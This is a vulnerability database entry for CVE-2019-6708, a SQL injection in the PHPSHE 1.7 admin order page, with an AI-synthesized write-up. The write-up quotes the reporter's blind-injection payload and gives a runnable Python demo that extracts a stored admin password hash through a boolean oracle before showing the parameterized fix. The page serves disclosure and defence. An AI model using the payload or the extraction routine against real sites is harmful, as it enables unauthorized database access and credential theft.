CVE-2019-6708
Description
PHPSHE 1.7 has SQL injection via the admin.php?mod=order state parameter.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
PHPSHE 1.7 has a SQL injection in admin.php via the state parameter of the mod=order action, which allows an authenticated administrator to execute arbitrary SQL queries against the application database.
Vulnerability
PHPSHE version 1.7 (build 20180905 UTF8) contains a SQL injection vulnerability in the admin.php endpoint. The state GET parameter is passed into the pe_selectall function without sanitization, so an authenticated attacker can alter the intended SQL query [1]. The vulnerable code path is reached by requesting admin.php?mod=order&state=wtuan [1].
Exploitation
An attacker needs valid administrative credentials to reach the admin panel. The proof of concept demonstrates a boolean-based blind SQL injection using a crafted value for the state parameter: wtuan' AND 3809=(SELECT (CASE WHEN (3809=3809) THEN 3809 ELSE (SELECT 6050 UNION SELECT 8971) END))-- LULI [1]. The CASE expression evaluates cleanly when its condition is true; when it is false it falls through to a scalar subquery that returns two rows, which MySQL rejects, so the page responds differently for true and false conditions. That difference is the oracle that lets an attacker extract database contents one true/false question at a time. The injection can be driven with sqlmap using --dbms=mysql and --level=3 [1].
Impact
Successful exploitation allows an authenticated administrator to execute arbitrary SQL commands against the underlying MySQL database, leading to information disclosure of all database contents, including user credentials and sensitive application data [1]. The attacker can modify or delete data, potentially compromising the entire application [1].
Mitigation
As of the publication date, no official vendor patch has been identified. The reporter's recommended fix is to stop concatenating request parameters directly into SQL strings [1]: the state value should be validated against the set of expected order states and bound to the query as a parameter rather than spliced into it. Since no fixed version is available, restricting access to the admin panel and monitoring it for anomalous requests are advised as workarounds [1].
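The following is an added example, not PHPSHE's own code and not the reporter's proof of concept. It reconstructs the flaw described above (a raw state value spliced into an order query), shows how a boolean-based blind oracle built on that flaw recovers data one character at a time, and shows the parameterized query that closes it. SQLite stands in for MySQL so it runs offline, and the table names pe_order and pe_admin, the column names, and the row contents are constructed assumptions for illustration; in MySQL the character-probing function would be ord() or ascii() rather than unicode().

```python
import sqlite3


def build_db():
    # Constructed in-memory stand-in for the application's MySQL schema.
    # Table, column and row contents are assumptions for this example only.
    conn = sqlite3.connect(":memory:")
    cur = conn.cursor()
    cur.execute("CREATE TABLE pe_order (order_id INTEGER PRIMARY KEY, "
                "order_state TEXT, user_id INTEGER)")
    cur.executemany("INSERT INTO pe_order (order_state, user_id) VALUES (?, ?)",
                    [("wtuan", 1), ("wtuan", 2), ("wfahuo", 3)])
    cur.execute("CREATE TABLE pe_admin (admin_id INTEGER PRIMARY KEY, "
                "admin_name TEXT, admin_pw TEXT)")
    cur.execute("INSERT INTO pe_admin (admin_name, admin_pw) "
                "VALUES ('admin', 'e10adc3949ba59abbe56e057f20f883e')")
    conn.commit()
    return conn


def list_orders_vulnerable(conn, state):
    # Hypothetical reconstruction of the flawed pattern: the raw GET value
    # is concatenated straight into the WHERE clause.
    sql = "SELECT order_id FROM pe_order WHERE order_state = '" + state + "'"
    return [row[0] for row in conn.execute(sql)]


def list_orders_fixed(conn, state):
    # Hardened form: the value is bound as a parameter, so quotes and
    # comment sequences inside it are data, never SQL syntax.
    sql = "SELECT order_id FROM pe_order WHERE order_state = ?"
    return [row[0] for row in conn.execute(sql, (state,))]


def oracle(conn, condition):
    """True iff `condition` holds, judged only by whether any rows come back.

    The attacker keeps the legitimate state value so the query still matches
    rows when the injected condition is true, and comments out the closing
    quote the application appends.
    """
    payload = "wtuan' AND (" + condition + ")-- "
    return len(list_orders_vulnerable(conn, payload)) > 0


def extract(conn, expr, maxlen=64):
    """Recover the text value of a scalar SQL expression through the oracle.

    Each character is found by binary search over its code point, the same
    strategy sqlmap's boolean-based blind technique uses.
    """
    out = ""
    for pos in range(1, maxlen + 1):
        probe = "unicode(substr((" + expr + ")," + str(pos) + ",1)) >= "
        # unicode('') is NULL, so the comparison is false once the string ends.
        if not oracle(conn, probe + "32"):
            break
        lo, hi = 32, 126  # printable ASCII
        while lo < hi:
            mid = (lo + hi + 1) // 2
            if oracle(conn, probe + str(mid)):
                lo = mid
            else:
                hi = mid - 1
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = build_db()
    print("normal:", list_orders_vulnerable(db, "wtuan"))
    print("tautology:", list_orders_vulnerable(db, "wtuan' OR 1=1-- "))
    print("blind-extracted password hash:",
          extract(db, "SELECT admin_pw FROM pe_admin WHERE admin_id = 1"))
    print("same tautology against the fixed query:",
          list_orders_fixed(db, "wtuan' OR 1=1-- "))
```

Run stand-alone, the script shows the tautology widening the result set, the blind loop reading the stored admin password hash out of a table the order page never references, and the parameterized query returning nothing for the same payload because no order has that literal string as its state.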
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products: 1
Patches: 0 (no patches discovered yet)
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
[1] github.com/kk98kk0/exploit/issues/2 (MISC)
News mentions: 0 (no linked articles in our index yet)